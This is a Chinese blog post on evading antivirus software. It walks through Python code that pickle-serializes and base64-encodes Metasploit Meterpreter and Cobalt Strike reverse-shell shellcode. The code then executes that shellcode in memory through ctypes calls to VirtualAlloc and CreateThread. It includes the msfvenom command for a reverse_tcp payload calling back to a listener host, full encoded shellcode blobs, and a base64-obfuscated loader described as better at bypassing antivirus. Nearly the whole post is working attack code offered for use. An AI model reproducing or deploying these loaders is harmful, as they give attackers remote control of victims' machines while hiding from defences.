免杀对抗-MSF\CS-shellcode反序列化

已于 2023-04-25 16:08:33 修改
阅读量589 收藏
点赞数
分类专栏: 免杀对抗 文章标签: 安全
于 2023-04-25 16:08:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62172162/article/details/130367393
版权
文章展示了如何使用Python进行序列化操作来构造和解码shellcode,然后通过WindowsAPI在内存中执行。示例代码包括了如何创建和解密payload,以及如何在Python环境中加载和执行解密后的shellcode。
摘要由CSDN通过智能技术生成

目录

1.py

2.py

上线过程

1.py

对代码段进行序列化数据生成

import pickle
import base64

#shellcode值如下面两块代码块,直接插进来即可
shellcode ='''

'''
class A(object):
    def __reduce__(self):
        return exec, (shellcode,)
#exec将shellcode的文本信息当作代码执行


ret = pickle.dumps(A())
ret_base64 = base64.b64encode(ret)
print(ret_base64)
#将生成的序列化数据即序列化shellcode插进2.py里面的shellcode,进行反序列化,编译的过程中将执行上述shellcode里面的文本当作代码执行


生成对象A的序列化数据并base64编码
对象A在干嘛?
调用魔术方法进行exec shellcode执行
shellcode是一整块源码,如下:

base64生成的加密payload:
msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhost=192.168.19.150 lport=6688 -f c


#以下是base64编码的上线py
import ctypes
import base64

encode_shellcode = b""
encode_shellcode += b"\x2f\x45\x69\x44\x35\x50\x44\x6f\x7a\x41\x41\x41\x41\x45"
encode_shellcode += b"\x46\x52\x51\x56\x42\x53\x53\x44\x48\x53\x5a\x55\x69\x4c"
encode_shellcode += b"\x55\x6d\x42\x49\x69\x31\x49\x59\x55\x56\x5a\x49\x69\x31"
encode_shellcode += b"\x49\x67\x54\x54\x48\x4a\x53\x41\x2b\x33\x53\x6b\x70\x49"
encode_shellcode += b"\x69\x33\x4a\x51\x53\x44\x48\x41\x72\x44\x78\x68\x66\x41"
encode_shellcode += b"\x49\x73\x49\x45\x48\x42\x79\x51\x31\x42\x41\x63\x48\x69"
encode_shellcode += b"\x37\x56\x4a\x42\x55\x55\x69\x4c\x55\x69\x43\x4c\x51\x6a"
encode_shellcode += b"\x78\x49\x41\x64\x42\x6d\x67\x58\x67\x59\x43\x77\x49\x50"
encode_shellcode += b"\x68\x58\x49\x41\x41\x41\x43\x4c\x67\x49\x67\x41\x41\x41"
encode_shellcode += b"\x42\x49\x68\x63\x42\x30\x5a\x30\x67\x42\x30\x49\x74\x49"
encode_shellcode += b"\x47\x45\x53\x4c\x51\x43\x42\x4a\x41\x64\x42\x51\x34\x31"
encode_shellcode += b"\x5a\x49\x2f\x38\x6c\x4e\x4d\x63\x6c\x42\x69\x7a\x53\x49"
encode_shellcode += b"\x53\x41\x48\x57\x53\x44\x48\x41\x72\x45\x48\x42\x79\x51"
encode_shellcode += b"\x31\x42\x41\x63\x45\x34\x34\x48\x58\x78\x54\x41\x4e\x4d"
encode_shellcode += b"\x4a\x41\x68\x46\x4f\x64\x46\x31\x32\x46\x68\x45\x69\x30"
encode_shellcode += b"\x41\x6b\x53\x51\x48\x51\x5a\x6b\x47\x4c\x44\x45\x68\x45"
encode_shellcode += b"\x69\x30\x41\x63\x53\x51\x48\x51\x51\x59\x73\x45\x69\x45"
encode_shellcode += b"\x67\x42\x30\x45\x46\x59\x51\x56\x68\x65\x57\x56\x70\x42"
encode_shellcode += b"\x57\x45\x46\x5a\x51\x56\x70\x49\x67\x2b\x77\x67\x51\x56"
encode_shellcode += b"\x4c\x2f\x34\x46\x68\x42\x57\x56\x70\x49\x69\x78\x4c\x70"
encode_shellcode += b"\x53\x2f\x2f\x2f\x2f\x31\x31\x4a\x76\x6e\x64\x7a\x4d\x6c"
encode_shellcode += b"\x38\x7a\x4d\x67\x41\x41\x51\x56\x5a\x4a\x69\x65\x5a\x49"
encode_shellcode += b"\x67\x65\x79\x67\x41\x51\x41\x41\x53\x59\x6e\x6c\x53\x62"
encode_shellcode += b"\x77\x43\x41\x42\x6f\x67\x77\x4b\x67\x54\x6c\x6b\x46\x55"
encode_shellcode += b"\x53\x59\x6e\x6b\x54\x49\x6e\x78\x51\x62\x70\x4d\x64\x79"
encode_shellcode += b"\x59\x48\x2f\x39\x56\x4d\x69\x65\x70\x6f\x41\x51\x45\x41"
encode_shellcode += b"\x41\x46\x6c\x42\x75\x69\x6d\x41\x61\x77\x44\x2f\x31\x57"
encode_shellcode += b"\x6f\x4b\x51\x56\x35\x51\x55\x45\x30\x78\x79\x55\x30\x78"
encode_shellcode += b"\x77\x45\x6a\x2f\x77\x45\x69\x4a\x77\x6b\x6a\x2f\x77\x45"
encode_shellcode += b"\x69\x4a\x77\x55\x47\x36\x36\x67\x2f\x66\x34\x50\x2f\x56"
encode_shellcode += b"\x53\x49\x6e\x48\x61\x68\x42\x42\x57\x45\x79\x4a\x34\x6b"
encode_shellcode += b"\x69\x4a\x2b\x55\x47\x36\x6d\x61\x56\x30\x59\x66\x2f\x56"
encode_shellcode += b"\x68\x63\x42\x30\x43\x6b\x6e\x2f\x7a\x6e\x58\x6c\x36\x4a"
encode_shellcode += b"\x4d\x41\x41\x41\x42\x49\x67\x2b\x77\x51\x53\x49\x6e\x69"
encode_shellcode += b"\x54\x54\x48\x4a\x61\x67\x52\x42\x57\x45\x69\x4a\x2b\x55"
encode_shellcode += b"\x47\x36\x41\x74\x6e\x49\x58\x2f\x2f\x56\x67\x2f\x67\x41"
encode_shellcode += b"\x66\x6c\x56\x49\x67\x38\x51\x67\x58\x6f\x6e\x32\x61\x6b"
encode_shellcode += b"\x42\x42\x57\x57\x67\x41\x45\x41\x41\x41\x51\x56\x68\x49"
encode_shellcode += b"\x69\x66\x4a\x49\x4d\x63\x6c\x42\x75\x6c\x69\x6b\x55\x2b"
encode_shellcode += b"\x58\x2f\x31\x55\x69\x4a\x77\x30\x6d\x4a\x78\x30\x30\x78"
encode_shellcode += b"\x79\x55\x6d\x4a\x38\x45\x69\x4a\x32\x6b\x69\x4a\x2b\x55"
encode_shellcode += b"\x47\x36\x41\x74\x6e\x49\x58\x2f\x2f\x56\x67\x2f\x67\x41"
encode_shellcode += b"\x66\x53\x68\x59\x51\x56\x64\x5a\x61\x41\x42\x41\x41\x41"
encode_shellcode += b"\x42\x42\x57\x47\x6f\x41\x57\x6b\x47\x36\x43\x79\x38\x50"
encode_shellcode += b"\x4d\x50\x2f\x56\x56\x31\x6c\x42\x75\x6e\x56\x75\x54\x57"
encode_shellcode += b"\x48\x2f\x31\x55\x6e\x2f\x7a\x75\x6b\x38\x2f\x2f\x2f\x2f"
encode_shellcode += b"\x53\x41\x48\x44\x53\x43\x6e\x47\x53\x49\x58\x32\x64\x62"
encode_shellcode += b"\x52\x42\x2f\x2b\x64\x59\x61\x67\x42\x5a\x53\x63\x66\x43"
encode_shellcode += b"\x38\x4c\x57\x69\x56\x76\x2f\x56"
#解码
shellcode = base64.b64decode(encode_shellcode)

ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x3000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage), ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(rwxpage), 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)


OR

import ctypes
import base64

# cs,需要将生成的payload进行base64加密
shellcode=b'/EiD5PDoyAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwJ1couAiAAAAEiFwHRnSAHQUItIGESLQCBJAdDjVkj/yUGLNIhIAdZNMclIMcCsQcHJDUEBwTjgdfFMA0wkCEU50XXYWESLQCRJAdBmQYsMSESLQBxJAdBBiwSISAHQQVhBWF5ZWkFYQVlBWkiD7CBBUv/gWEFZWkiLEulPXWoASb53aW5pbmV0AEFWSYnmTInxQbpMdyYH/9VIMclIMdJNMcBNMclBUEFQQbo6Vnmn/9Xrc1pIicFBuCAaAABNMclBUUFRagNBUUG6V4mfxv/V61lbSInBSDHSSYnYTTHJUmgAAkCEUlJBuutVLjv/1UiJxkiDw1BqCl9IifFIidpJx8D/TTHJUlJBui0GGHv/1YXAD4WdAQAASP/PD4SMAQAA69Pp5AEAAOiiL0dXeEcADBHQA2UlJG9WXfPOLnIMwVIadjd6T751LQjP7CzDvH5ii+loNJDvAnyGACcv6DgVmx9plvq5BnqrDGq+ziEAm9khqIda5KWYTQBVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoY29tcGF0aWJsZTsgTVNJRSA5LjA7IFdpbmRvd3MgTlQgNi4wOyBUcmlkZW50LzUuMDsgQk9JRTk7RU5VUykNCgDa5zqsyAsY1zK74s++6vU4oR1CRNd/GkETmSNwVwwlJ+utIczKGV1H14RMti8cB87ochv91yZE8prqplXb6ddXOMJfKy8b6yavtoUx3ZpqNVU6qpyT9bUfrxXOdzmS9bHmUgE3ec0/u43dDe6/n9WDipxDRlE7Xmx4Ht671qf0rYa6zNdjvnb+bUv1s6FzTJE/JRMyKvEX1fztPrWXKuAsDSIyhc9w4nRXfBZxLKtoLBQsq6ryEgbObXUCvFrKT5mGgvXfLZPf5YXE9jPrSPr6KdFpB6gAQb7wtaJW/9VIMcm6AABAAEG4ABAAAEG5QAAAAEG6WKRT5f/VSJNTU0iJ50iJ8UiJ2kG4ACAAAEmJ+UG6EpaJ4v/VSIPEIIXAdLZmiwdIAcOFwHXXWFhYSAUAAAAAUMPon/3//zE5Mi4xNjguMTkuMTUwABI0Vng='
#解密shellcode
shellcode=base64.b64decode(shellcode)
#添加加载器
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x3000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage), ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(rwxpage), 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)


注:以上的shellcode脚本可以将加载器进行base64加密后在插入解密,绕过杀软效果更好,如下CS的payload为例:

import ctypes
import base64

# cs,需要将生成的payload进行base64加密
shellcode=b'/EiD5PDoyAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwJ1couAiAAAAEiFwHRnSAHQUItIGESLQCBJAdDjVkj/yUGLNIhIAdZNMclIMcCsQcHJDUEBwTjgdfFMA0wkCEU50XXYWESLQCRJAdBmQYsMSESLQBxJAdBBiwSISAHQQVhBWF5ZWkFYQVlBWkiD7CBBUv/gWEFZWkiLEulPXWoASb53aW5pbmV0AEFWSYnmTInxQbpMdyYH/9VIMclIMdJNMcBNMclBUEFQQbo6Vnmn/9Xrc1pIicFBuCAaAABNMclBUUFRagNBUUG6V4mfxv/V61lbSInBSDHSSYnYTTHJUmgAAkCEUlJBuutVLjv/1UiJxkiDw1BqCl9IifFIidpJx8D/TTHJUlJBui0GGHv/1YXAD4WdAQAASP/PD4SMAQAA69Pp5AEAAOiiL0dXeEcADBHQA2UlJG9WXfPOLnIMwVIadjd6T751LQjP7CzDvH5ii+loNJDvAnyGACcv6DgVmx9plvq5BnqrDGq+ziEAm9khqIda5KWYTQBVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoY29tcGF0aWJsZTsgTVNJRSA5LjA7IFdpbmRvd3MgTlQgNi4wOyBUcmlkZW50LzUuMDsgQk9JRTk7RU5VUykNCgDa5zqsyAsY1zK74s++6vU4oR1CRNd/GkETmSNwVwwlJ+utIczKGV1H14RMti8cB87ochv91yZE8prqplXb6ddXOMJfKy8b6yavtoUx3ZpqNVU6qpyT9bUfrxXOdzmS9bHmUgE3ec0/u43dDe6/n9WDipxDRlE7Xmx4Ht671qf0rYa6zNdjvnb+bUv1s6FzTJE/JRMyKvEX1fztPrWXKuAsDSIyhc9w4nRXfBZxLKtoLBQsq6ryEgbObXUCvFrKT5mGgvXfLZPf5YXE9jPrSPr6KdFpB6gAQb7wtaJW/9VIMcm6AABAAEG4ABAAAEG5QAAAAEG6WKRT5f/VSJNTU0iJ50iJ8UiJ2kG4ACAAAEmJ+UG6EpaJ4v/VSIPEIIXAdLZmiwdIAcOFwHXXWFhYSAUAAAAAUMPon/3//zE5Mi4xNjguMTkuMTUwABI0Vng='
#解密shellcode
shellcode=base64.b64decode(shellcode)
#下面的加载器是先经过base64加密的,所以得解密
z='Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5WaXJ0dWFsQWxsb2MucmVzdHlwZSA9IGN0eXBlcy5jX3VpbnQ2NApyd3hwYWdlID0gY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5WaXJ0dWFsQWxsb2MoMCwgbGVuKHNoZWxsY29kZSksIDB4MzAwMCwgMHg0MCkKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChyd3hwYWdlKSwgY3R5cGVzLmNyZWF0ZV9zdHJpbmdfYnVmZmVyKHNoZWxsY29kZSksIGxlbihzaGVsbGNvZGUpKQpoYW5kbGUgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLkNyZWF0ZVRocmVhZCgwLCAwLCBjdHlwZXMuY191aW50NjQocnd4cGFnZSksIDAsIDAsIDApCmN0eXBlcy53aW5kbGwua2VybmVsMzIuV2FpdEZvclNpbmdsZU9iamVjdChoYW5kbGUsIC0xKQ=='
exec(base64.b64decode(z))
#修改后插入到shellcode位置处,1.py运行结果如下
#b'gASVpAcAAAAAAACMCGJ1aWx0aW5zlIwEZXhlY5STlFiFBwAACmltcG9ydCBjdHlwZXMKaW1wb3J0IGJhc2U2NAoKIyBjc++8jOmcgOimgeWwhueUn+aIkOeahHBheWxvYWTov5vooYxiYXNlNjTliqDlr4YKc2hlbGxjb2RlPWInL0VpRDVQRG95QUFBQUVGUlFWQlNVVlpJTWRKbFNJdFNZRWlMVWhoSWkxSWdTSXR5VUVnUHQwcEtUVEhKU0RIQXJEeGhmQUlzSUVIQnlRMUJBY0hpN1ZKQlVVaUxVaUNMUWp4SUFkQm1nWGdZQ3dKMWNvdUFpQUFBQUVpRndIUm5TQUhRVUl0SUdFU0xRQ0JKQWREalZrai95VUdMTkloSUFkWk5NY2xJTWNDc1FjSEpEVUVCd1RqZ2RmRk1BMHdrQ0VVNTBYWFlXRVNMUUNSSkFkQm1RWXNNU0VTTFFCeEpBZEJCaXdTSVNBSFFRVmhCV0Y1WldrRllRVmxCV2tpRDdDQkJVdi9nV0VGWldraUxFdWxQLy8vL1hXb0FTYjUzYVc1cGJtVjBBRUZXU1lubVRJbnhRYnBNZHlZSC85VklNY2xJTWRKTk1jQk5NY2xCVUVGUVFibzZWbm1uLzlYcmMxcElpY0ZCdUNBYUFBQk5NY2xCVVVGUmFnTkJVVUc2VjRtZnh2L1Y2MWxiU0luQlNESFNTWW5ZVFRISlVtZ0FBa0NFVWxKQnV1dFZManYvMVVpSnhraUR3MUJxQ2w5SWlmRklpZHBKeDhELy8vLy9UVEhKVWxKQnVpMEdHSHYvMVlYQUQ0V2RBUUFBU1AvUEQ0U01BUUFBNjlQcDVBRUFBT2lpLy8vL0wwZFhlRWNBREJIUUEyVWxKRzlXWGZQT0xuSU13VklhZGpkNlQ3NTFMUWpQN0N6RHZINWlpK2xvTkpEdkFueUdBQ2N2NkRnVm14OXBsdnE1Qm5xckRHcSt6aUVBbTlraHFJZGE1S1dZVFFCVmMyVnlMVUZuWlc1ME9pQk5iM3BwYkd4aEx6VXVNQ0FvWTI5dGNHRjBhV0pzWlRzZ1RWTkpSU0E1TGpBN0lGZHBibVJ2ZDNNZ1RsUWdOaTR3T3lCVWNtbGtaVzUwTHpVdU1Ec2dRazlKUlRrN1JVNVZVeWtOQ2dEYTV6cXN5QXNZMXpLNzRzKys2dlU0b1IxQ1JOZC9Ha0VUbVNOd1Z3d2xKK3V0SWN6S0dWMUgxNFJNdGk4Y0I4N29jaHY5MXlaRThwcnFwbFhiNmRkWE9NSmZLeThiNnlhdnRvVXgzWnBxTlZVNnFweVQ5YlVmcnhYT2R6bVM5YkhtVWdFM2VjMC91NDNkRGU2L245V0RpcHhEUmxFN1hteDRIdDY3MXFmMHJZYTZ6TmRqdm5iK2JVdjFzNkZ6VEpFL0pSTXlLdkVYMWZ6dFByV1hLdUFzRFNJeWhjOXc0blJYZkJaeExLdG9MQlFzcTZyeUVnYk9iWFVDdkZyS1Q1bUdndlhmTFpQZjVZWEU5alByU1ByNktkRnBCNmdBUWI3d3RhSlcvOVZJTWNtNkFBQkFBRUc0QUJBQUFFRzVRQUFBQUVHNldLUlQ1Zi9WU0pOVFUwaUo1MGlKOFVpSjJrRzRBQ0FBQUVtSitVRzZFcGFKNHYvVlNJUEVJSVhBZExabWl3ZElBY09Gd0hYWFdGaFlTQVVBQUFBQVVNUG9uLzMvL3pFNU1pNHhOamd1TVRrdU1UVXdBQkkwVm5nPScKI+ino+WvhnNoZWxsY29kZQpzaGVsbGNvZGU9YmFzZTY0LmI2NGRlY29kZShzaGVsbGNvZGUpCiPmt7vliqDliqDovb3lmagKej0nWTNSNWNHVnpMbmRwYm1Sc2JDNXJaWEp1Wld3ek1pNVdhWEowZFdGc1FXeHNiMk11Y21WemRIbHdaU0E5SUdOMGVYQmxjeTVqWDNWcGJuUTJOQXB5ZDNod1lXZGxJRDBnWTNSNWNHVnpMbmRwYm1Sc2JDNXJaWEp1Wld3ek1pNVdhWEowZFdGc1FXeHNiMk1vTUN3Z2JHVnVLSE5vWld4c1kyOWtaU2tzSURCNE16QXdNQ3dnTUhnME1Da0tZM1I1Y0dWekxuZHBibVJzYkM1clpYSnVaV3d6TWk1U2RHeE5iM1psVFdWdGIzSjVLR04wZVhCbGN5NWpYM1ZwYm5RMk5DaHlkM2h3WVdkbEtTd2dZM1I1Y0dWekxtTnlaV0YwWlY5emRISnBibWRmWW5WbVptVnlLSE5vWld4c1kyOWtaU2tzSUd4bGJpaHphR1ZzYkdOdlpHVXBLUXBvWVc1a2JHVWdQU0JqZEhsd1pYTXVkMmx1Wkd4c0xtdGxjbTVsYkRNeUxrTnlaV0YwWlZSb2NtVmhaQ2d3TENBd0xDQmpkSGx3WlhNdVkxOTFhVzUwTmpRb2NuZDRjR0ZuWlNrc0lEQXNJREFzSURBcENtTjBlWEJsY3k1M2FXNWtiR3d1YTJWeWJtVnNNekl1VjJGcGRFWnZjbE5wYm1kc1pVOWlhbVZqZENob1lXNWtiR1VzSUMweEtRPT0nCmV4ZWMoYmFzZTY0LmI2NGRlY29kZSh6KSmUhZRSlC4='


2.py


另外一个反序列化解析 执行 上线

import base64
import ctypes
import pickle
#MSF
#shellcode = b'gASVXAkAAAAAAACMCGJ1aWx0aW5zlIwEZXhlY5STlFg9CQAACmltcG9ydCBjdHlwZXMKaW1wb3J0IGJhc2U2NAoKZW5jb2RlX3NoZWxsY29kZSA9IGIiIgplbmNvZGVfc2hlbGxjb2RlICs9IGIiL0VpRDVQRG96QUFBQUUiCmVuY29kZV9zaGVsbGNvZGUgKz0gYiJGUlFWQlNTREhTWlVpTCIKZW5jb2RlX3NoZWxsY29kZSArPSBiIlVtQklpMUlZVVZaSWkxIgplbmNvZGVfc2hlbGxjb2RlICs9IGIiSWdUVEhKU0ErM1NrcEkiCmVuY29kZV9zaGVsbGNvZGUgKz0gYiJpM0pRU0RIQXJEeGhmQSIKZW5jb2RlX3NoZWxsY29kZSArPSBiIklzSUVIQnlRMUJBY0hpIgplbmNvZGVfc2hlbGxjb2RlICs9IGIiN1ZKQlVVaUxVaUNMUWoiCmVuY29kZV9zaGVsbGNvZGUgKz0gYiJ4SUFkQm1nWGdZQ3dJUCIKZW5jb2RlX3NoZWxsY29kZSArPSBiImhYSUFBQUNMZ0lnQUFBIgplbmNvZGVfc2hlbGxjb2RlICs9IGIiQkloY0IwWjBnQjBJdEkiCmVuY29kZV9zaGVsbGNvZGUgKz0gYiJHRVNMUUNCSkFkQlE0MSIKZW5jb2RlX3NoZWxsY29kZSArPSBiIlpJLzhsTk1jbEJpelNJIgplbmNvZGVfc2hlbGxjb2RlICs9IGIiU0FIV1NESEFyRUhCeVEiCmVuY29kZV9zaGVsbGNvZGUgKz0gYiIxQkFjRTQ0SFh4VEFOTSIKZW5jb2RlX3NoZWxsY29kZSArPSBiIkpBaEZPZEYxMkZoRWkwIgplbmNvZGVfc2hlbGxjb2RlICs9IGIiQWtTUUhRWmtHTERFaEUiCmVuY29kZV9zaGVsbGNvZGUgKz0gYiJpMEFjU1FIUVFZc0VpRSIKZW5jb2RlX3NoZWxsY29kZSArPSBiImdCMEVGWVFWaGVXVnBCIgplbmNvZGVfc2hlbGxjb2RlICs9IGIiV0VGWlFWcElnK3dnUVYiCmVuY29kZV9zaGVsbGNvZGUgKz0gYiJMLzRGaEJXVnBJaXhMcCIKZW5jb2RlX3NoZWxsY29kZSArPSBiIlMvLy8vMTFKdm5kek1sIgplbmNvZGVfc2hlbGxjb2RlICs9IGIiOHpNZ0FBUVZaSmllWkkiCmVuY29kZV9zaGVsbGNvZGUgKz0gYiJnZXlnQVFBQVNZbmxTYiIKZW5jb2RlX3NoZWxsY29kZSArPSBiIndDQUJvZ3dLZ1Rsa0ZVIgplbmNvZGVfc2hlbGxjb2RlICs9IGIiU1lua1RJbnhRYnBNZHkiCmVuY29kZV9zaGVsbGNvZGUgKz0gYiJZSC85Vk1pZXBvQVFFQSIKZW5jb2RlX3NoZWxsY29kZSArPSBiIkFGbEJ1aW1BYXdELzFXIgplbmNvZGVfc2hlbGxjb2RlICs9IGIib0tRVjVRVUUweHlVMHgiCmVuY29kZV9zaGVsbGNvZGUgKz0gYiJ3RWovd0VpSndrai93RSIKZW5jb2RlX3NoZWxsY29kZSArPSBiImlKd1VHNjZnL2Y0UC9WIgplbmNvZGVfc2hlbGxjb2RlICs9IGIiU0luSGFoQkJXRXlKNGsiCmVuY29kZV9zaGVsbGNvZGUgKz0gYiJpSitVRzZtYVYwWWYvViIKZW5jb2RlX3NoZWxsY29kZSArPSBiImhjQjBDa24vem5YbDZKIgplbmNvZGVfc2hlbGxjb2RlICs9IGIiTUFBQUJJZyt3UVNJbmkiCmVuY29kZV9zaGVsbGNvZGUgKz0gYiJUVEhKYWdSQldFaUorVSIKZW5jb2RlX3NoZWxsY29kZSArPSBiIkc2QXRuSVgvL1ZnL2dBIgplbmNvZGVfc2hlbGxjb2RlICs9IGIiZmxWSWc4UWdYb24yYWsiCmVuY29kZV9zaGVsbGNvZGUgKz0gYiJCQldXZ0FFQUFBUVZoSSIKZW5jb2RlX3NoZWxsY29kZSArPSBiImlmSklNY2xCdWxpa1UrIgplbmNvZGVfc2hlbGxjb2RlICs9IGIiWC8xVWlKdzBtSngwMHgiCmVuY29kZV9zaGVsbGNvZGUgKz0gYiJ5VW1KOEVpSjJraUorVSIKZW5jb2RlX3NoZWxsY29kZSArPSBiIkc2QXRuSVgvL1ZnL2dBIgplbmNvZGVfc2hlbGxjb2RlICs9IGIiZlNoWVFWZFphQUJBQUEiCmVuY29kZV9zaGVsbGNvZGUgKz0gYiJCQldHb0FXa0c2Q3k4UCIKZW5jb2RlX3NoZWxsY29kZSArPSBiIk1QL1ZWMWxCdW5WdVRXIgplbmNvZGVfc2hlbGxjb2RlICs9IGIiSC8xVW4venVrOC8vLy8iCmVuY29kZV9zaGVsbGNvZGUgKz0gYiJTQUhEU0NuR1NJWDJkYiIKZW5jb2RlX3NoZWxsY29kZSArPSBiIlJCLytkWWFnQlpTY2ZDIgplbmNvZGVfc2hlbGxjb2RlICs9IGIiOExXaVZ2L1YiCiPop6PnoIEKc2hlbGxjb2RlID0gYmFzZTY0LmI2NGRlY29kZShlbmNvZGVfc2hlbGxjb2RlKQoKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5WaXJ0dWFsQWxsb2MucmVzdHlwZSA9IGN0eXBlcy5jX3VpbnQ2NApyd3hwYWdlID0gY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5WaXJ0dWFsQWxsb2MoMCwgbGVuKHNoZWxsY29kZSksIDB4MzAwMCwgMHg0MCkKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChyd3hwYWdlKSwgY3R5cGVzLmNyZWF0ZV9zdHJpbmdfYnVmZmVyKHNoZWxsY29kZSksIGxlbihzaGVsbGNvZGUpKQpoYW5kbGUgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLkNyZWF0ZVRocmVhZCgwLCAwLCBjdHlwZXMuY191aW50NjQocnd4cGFnZSksIDAsIDAsIDApCmN0eXBlcy53aW5kbGwua2VybmVsMzIuV2FpdEZvclNpbmdsZU9iamVjdChoYW5kbGUsIC0xKZSFlFKULg=='

#CS
shellcode = b'gASV0AYAAAAAAACMCGJ1aWx0aW5zlIwEZXhlY5STlFixBgAACmltcG9ydCBjdHlwZXMKaW1wb3J0IGJhc2U2NAoKIyBjcwpzaGVsbGNvZGU9YicvRWlENVBEb3lBQUFBRUZSUVZCU1VWWklNZEpsU0l0U1lFaUxVaGhJaTFJZ1NJdHlVRWdQdDBwS1RUSEpTREhBckR4aGZBSXNJRUhCeVExQkFjSGk3VkpCVVVpTFVpQ0xRanhJQWRCbWdYZ1lDd0oxY291QWlBQUFBRWlGd0hSblNBSFFVSXRJR0VTTFFDQkpBZERqVmtqL3lVR0xOSWhJQWRaTk1jbElNY0NzUWNISkRVRUJ3VGpnZGZGTUEwd2tDRVU1MFhYWVdFU0xRQ1JKQWRCbVFZc01TRVNMUUJ4SkFkQkJpd1NJU0FIUVFWaEJXRjVaV2tGWVFWbEJXa2lEN0NCQlV2L2dXRUZaV2tpTEV1bFAvLy8vWFdvQVNiNTNhVzVwYm1WMEFFRldTWW5tVElueFFicE1keVlILzlWSU1jbElNZEpOTWNCTk1jbEJVRUZRUWJvNlZubW4vOVhyYzFwSWljRkJ1Q0FhQUFCTk1jbEJVVUZSYWdOQlVVRzZWNG1meHYvVjYxbGJTSW5CU0RIU1NZbllUVEhKVW1nQUFrQ0VVbEpCdXV0Vkxqdi8xVWlKeGtpRHcxQnFDbDlJaWZGSWlkcEp4OEQvLy8vL1RUSEpVbEpCdWkwR0dIdi8xWVhBRDRXZEFRQUFTUC9QRDRTTUFRQUE2OVBwNUFFQUFPaWkvLy8vTDBkWGVFY0FEQkhRQTJVbEpHOVdYZlBPTG5JTXdWSWFkamQ2VDc1MUxRalA3Q3pEdkg1aWkrbG9OSkR2QW55R0FDY3Y2RGdWbXg5cGx2cTVCbnFyREdxK3ppRUFtOWtocUlkYTVLV1lUUUJWYzJWeUxVRm5aVzUwT2lCTmIzcHBiR3hoTHpVdU1DQW9ZMjl0Y0dGMGFXSnNaVHNnVFZOSlJTQTVMakE3SUZkcGJtUnZkM01nVGxRZ05pNHdPeUJVY21sa1pXNTBMelV1TURzZ1FrOUpSVGs3UlU1VlV5a05DZ0RhNXpxc3lBc1kxeks3NHMrKzZ2VTRvUjFDUk5kL0drRVRtU053Vnd3bEordXRJY3pLR1YxSDE0Uk10aThjQjg3b2NodjkxeVpFOHBycXBsWGI2ZGRYT01KZkt5OGI2eWF2dG9VeDNacHFOVlU2cXB5VDliVWZyeFhPZHptUzliSG1VZ0UzZWMwL3U0M2REZTYvbjlXRGlweERSbEU3WG14NEh0NjcxcWYwcllhNnpOZGp2bmIrYlV2MXM2RnpUSkUvSlJNeUt2RVgxZnp0UHJXWEt1QXNEU0l5aGM5dzRuUlhmQlp4TEt0b0xCUXNxNnJ5RWdiT2JYVUN2RnJLVDVtR2d2WGZMWlBmNVlYRTlqUHJTUHI2S2RGcEI2Z0FRYjd3dGFKVy85VklNY202QUFCQUFFRzRBQkFBQUVHNVFBQUFBRUc2V0tSVDVmL1ZTSk5UVTBpSjUwaUo4VWlKMmtHNEFDQUFBRW1KK1VHNkVwYUo0di9WU0lQRUlJWEFkTFptaXdkSUFjT0Z3SFhYV0ZoWVNBVUFBQUFBVU1Qb24vMy8vekU1TWk0eE5qZ3VNVGt1TVRVd0FCSTBWbmc9Jwoj6Kej5a+Gc2hlbGxjb2RlCnNoZWxsY29kZT1iYXNlNjQuYjY0ZGVjb2RlKHNoZWxsY29kZSkKI+a3u+WKoOWKoOi9veWZqApjdHlwZXMud2luZGxsLmtlcm5lbDMyLlZpcnR1YWxBbGxvYy5yZXN0eXBlID0gY3R5cGVzLmNfdWludDY0CnJ3eHBhZ2UgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLlZpcnR1YWxBbGxvYygwLCBsZW4oc2hlbGxjb2RlKSwgMHgzMDAwLCAweDQwKQpjdHlwZXMud2luZGxsLmtlcm5lbDMyLlJ0bE1vdmVNZW1vcnkoY3R5cGVzLmNfdWludDY0KHJ3eHBhZ2UpLCBjdHlwZXMuY3JlYXRlX3N0cmluZ19idWZmZXIoc2hlbGxjb2RlKSwgbGVuKHNoZWxsY29kZSkpCmhhbmRsZSA9IGN0eXBlcy53aW5kbGwua2VybmVsMzIuQ3JlYXRlVGhyZWFkKDAsIDAsIGN0eXBlcy5jX3VpbnQ2NChyd3hwYWdlKSwgMCwgMCwgMCkKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5XYWl0Rm9yU2luZ2xlT2JqZWN0KGhhbmRsZSwgLTEplIWUUpQu'

